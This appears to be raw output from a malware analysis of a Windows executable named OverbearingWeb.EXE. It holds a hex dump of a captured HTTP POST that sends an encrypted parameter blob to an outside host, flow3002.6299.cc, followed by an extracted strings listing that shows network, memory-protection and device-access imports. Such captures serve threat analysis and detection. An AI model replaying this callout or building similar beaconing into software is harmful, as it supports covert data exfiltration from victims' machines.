0x000001b0 (00432)   39434137 34413537 37454136 41353137   9CA74A577EA6A517
0x000001c0 (00448)   31304131 36464236 33334641 36384130   10A16FB633FA68A0
0x000001d0 (00464)   32414633 32464335 38334542 43434145   2AF32FC583EBCCAE
0x000001e0 (00480)   33363432 32333639 44413239 33374244   36422369DA2937BD
0x000001f0 (00496)   46323844 37323030 36363037 4238       F28D72006607B8

0x00000000 (00000)   504f5354 202f436c 69656e74 4150492f   POST /ClientAPI/
0x00000010 (00016)   666c6f77 7461736b 4150492e 61737078   flowtaskAPI.aspx
0x00000020 (00032)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000030 (00048)   743a202a 2f2a0d0a 436f6e74 656e742d   t: */*..Content-
0x00000040 (00064)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x00000050 (00080)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000060 (00096)   656e636f 6465640d 0a557365 722d4167   encoded..User-Ag
0x00000070 (00112)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x00000080 (00128)   2028636f 6d706174 69626c65 290d0a48    (compatible)..H
0x00000090 (00144)   6f73743a 20666c6f 77333030 322e3632   ost: flow3002.62
0x000000a0 (00160)   39392e63 630d0a43 6f6e7465 6e742d4c   99.cc..Content-L
0x000000b0 (00176)   656e6774 683a2031 36370d0a 43616368   ength: 167..Cach
0x000000c0 (00192)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000d0 (00208)   6368650d 0a0d0a70 6172656d 733d3734   che....parems=74
0x000000e0 (00224)   33324139 35364236 32433731 31323242   32A956B62C71122B
0x000000f0 (00240)   34453137 43454637 33333330 45373737   4E17CEF73330E777
0x00000100 (00256)   37454431 31424534 41433544 45343939   7ED11BE4AC5DE499
0x00000110 (00272)   36374431 32344431 33434546 39384546   67D124D13CEF98EF
0x00000120 (00288)   38313043 43314543 31433432 33394332   810CC1EC1C4239C2
0x00000130 (00304)   37434341 34424245 31363144 46313741   7CCA4BBE161DF17A
0x00000140 (00320)   44424531 42394245 39313643 41353342   DBE1B9BE916CA53B
0x00000150 (00336)   42303839 37334535 35463134 32423941   B08973E55F142B9A
0x00000160 (00352)   32363046 33314632 44453242 42443439   260F31F2DE2BBD49
0x00000170 (00368)   31423346 30344430 41303444 36456472   1B3F04D0A04D6Edr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a41 35433235 45423945   /html>.A5C25EB9E
0x000001a0 (00416)   43414235 36353234 43434135 33303241   CAB56524CCA5302A
0x000001b0 (00432)   39434137 34413537 37454136 41353137   9CA74A577EA6A517
0x000001c0 (00448)   31304131 36464236 33334641 36384130   10A16FB633FA68A0
0x000001d0 (00464)   32414633 32464335 38334542 43434145   2AF32FC583EBCCAE
0x000001e0 (00480)   33363432 32333639 44413239 33374244   36422369DA2937BD
0x000001f0 (00496)   46323844 37323030 36363037 4238       F28D72006607B8


Strings
.7o.
..
w
d.
..
.f
.7o.
..
w
d.
..
.f

080404B0
1, 0, 0, 1
 (C) 2014
CompanyName
FileDescription
FileVersion
InternalName
LegalCopyright
LegalTrademarks
OriginalFilename
OverbearingWeb
OverbearingWeb 
OverbearingWeb.EXE
OverbearingWeb Microsoft 
ProductName
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
 !"#$%
,(####$ 
&'()*+,-./
0@(;ax7hwa
$0O,y7e
.1688{
>1?FX_6
??1tF_iV
=20084.2
299.cc/Client
2fred5
2l0-4M
2=M\ns
@2 W`H2
3002#flow_apikey_xh
.32o/dZ{[
#+3;Ci
3'Keep
 $3/,O.
4!+0a.
4d%028l
@4DBZEW
4f`ZTN
4JD>82
4Mc|w{
4#S2<8t`
4sOv&[Y.v
;5YNqrs}
60*8lK
<6\@{0.Mi
&62,QN7
6< 4LPs
6inx Q
;70n$##"
 $*7B/
	7C<eu
-7Fb,<y
7P-%+o
>82 DC
83t[1g
_}8 \8
89+/D>?
8<FFFF@DHLFFFFPTX\FFFF`dhlFFFFptx|FFFF
8 Mark A
8>qg(= 
>8R# D	u
9hs+eA
9&koHUT
;%`+{#9O;
A_0[oku
+A+%3K"
a/4.0 (
ABCDEFGHIJKLMNO
ABF:QT@v
ADVAPI32.dll
\aE[blG$  
at[ekUw
aT$]V( 
A@UQz8
AUT5ul4n
[A-Za-z]{3}),
AZSle~i
=BB=,EYm
BFUa.X
b-fYm-G
B$`'GP
BH8z^p:
%B/!M*!	
B>\s\d{2}-
 $B"T$kY
bugSg(r
 caSr./B
C__CxxFzHan
cdefghijklmnopqrstuvwxyz01234567
Cg@b	g 
c":"get
[ cKa-
[]code
 Copyright
coU	Ft
ctyZW@i
%CXb)c
cy.t? 
&\}Cz4w
D348/8r%
dCLR 2T
d":d6_h
DDDDD@
DDDDDDD
DDDDDDDDD
DDDDDDDDDDD
DDDDDDDDDDDDD
DDLDLD
DDLLDDDL
D""fT**~;
d+j!5c 
d[o95`
do{-nn/Yt(
 DOS m
DPQRDP
Dxt,vk:*t
Ed|"qq
Embede
e_rand[;{
E,\ShtK
eVC&9g
ExitProcess
	-f3F2
F@:44M
F|dPOWVS
f[j-3*/
fnn_wP
fqpA-b)x
g;:;<=
G1Las5%
\G`AMp
GC8 H`
GetProcAddress
GMT)%l
GrraSplT@rh:+
gsc|w{
h$6](]
?@H7J_
HB<60=
}HC4Q|
H)d.L=
hg'E< 
-HH2:G
Hi:xUB
hOb\VP4M
HPSQbt
HrCg@b	g 
hrome.exettp://"..6
$_hV=>N
hypyxy
	i~3.5.390V
iAal{v
 iciNWq
/ig	.qq-+]
?iIf+9
i m`wz
 inflate 1.
/InfoP
InternetOpenA
iRpAh ?
IsIconic
i~sP]Ji
i]s.ZR
i\VPJD
IvQRP@
jd>\>|0
j,e^4M
.jM5"l
jN#CjFo
J%%o\..r8
J=q;h@
jWmX@8
Kb`Z*/z
KERNEL
KERNEL32.DLL
KPYfoti
kw3 QR&#<9lhuOp
kX6sW_,70
l4kedD"7m
l*Cr	c
LDDDDDDD
-+ldn'
L&&jl66Z~??A
LLDDLD
~l\L<f
LoadLibraryA
lP~4*P 
LPq,1Ev
lQQ/(.-
(&lscGC/
.M3-x|
|M_6G'KU
MAGEHLPA
Md7'Jx
MFC42.DLL
MFC42.DLLn
; MSIE 
MSVCP60.dll
MSVCRT
MSVCRT.dll
'Mylait
mZ<OG=
N4h(eP
`n]|9;
NBO r+[i
n|Od&)\
nQOmR[
nsxIB_i
 NT 6.1
Ocgi-b
OhopID
O`JH.y
O*+nA<
O.no\B/wS]
ool2r)
oryHC^i
owcan` ru
_o`x}qdO!
oxuV[Li
parems=
#p$B1 
\\.\Phys[{
pkb]TO
Po#MLk
ppend%8h
_<PPTbq\M?2
PT./tF*-
P;vl!'6L
 ?P,(x=
pXEff$$
PyX`yg
QD_TG^d+
QERy#8
Qkkbal
QTk fp
QZ^&\key
 r+6#"
R[[\cA
REFNAVdSTYK
RE'URLK
r!'hhfK
RmhtT<
RODu~ci
R+PB~,
rPyifmk
s4V\Cw
sb11S*
SHELL32.dll
SHGetSpecialFolderPathA
Sk%+	A
/-?SLCC
 S+^Qt
SS(605
Sta]pI
STVXYZab
sWV14LR
T4k. T
t&B\X`F(
tFqi}W
tg8,p[f
!This program cannot be run in DOS mode.
>ThwZ(
;t-+oz
TRP^jx
tU,v3;
?twG78843e'
-Typeq
&[?|@u
++)(U7
@@UAE@XZ/
uFVB"2
UGhQ~5
u+K;cKF#
UmLG-;
U!M_PL
 unzip 0
Updat!
 -URL{
USER32.dll
userid
V2SION
vG|,xU
V.,:I[/
VirtualProtect
vma>ar
!/.vv;'4FUq{}kJ#B
VzZi`;>
,wBu$79V+
WININET.dll
WkomRz
WORD}&s
WQBEIPBDII@\6*
};WSBl
%!X4mW
|xFFFFtplhFFFFd`\XFFFFTPLHFFFFD@<8FFFF40,(y>GF$
X/@G{f
X}K8D,
~Xkksv
x@""kv
?_Xlen@std@@YAXXZ
XPTPSW
XPVSS#
{-?[Xt
Y6R'v^
y{lL~H;3Hv
Y%{nXC<;K
yS_I1yp.
!/y%`/x
y~x3+h
yyT:f"s
Z{1utL8
zahW^Ei
Ze2Zh@
@^(zLhW3
ztnhbk
z_{YMUo